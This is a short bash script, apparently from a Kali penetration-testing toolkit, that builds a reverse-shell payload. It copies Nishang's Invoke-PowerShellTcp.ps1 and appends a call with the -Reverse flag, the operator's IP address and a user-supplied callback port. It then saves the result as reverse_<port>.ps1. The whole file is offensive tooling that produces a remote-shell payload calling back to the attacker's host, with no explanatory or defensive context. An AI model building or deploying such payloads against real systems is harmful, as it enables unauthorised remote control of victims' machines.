#!/bin/bash
if [ $# -eq 0 ]; then
    echo "Usage: Nishang [callback port]"
    exit 1
fi
IP=$( IP_No_Clip );                      
New_IP=$( echo -n $IP );                                                                                                              
cp /home/kali/Ops/Tools/Invoke-PowerShellTcp.ps1 .;
echo "Invoke-PowerShellTcp -Reverse -IPAddress $New_IP -Port $1" >> Invoke-PowerShellTcp.ps1;
mv Invoke-PowerShellTcp.ps1 reverse_$1.ps1
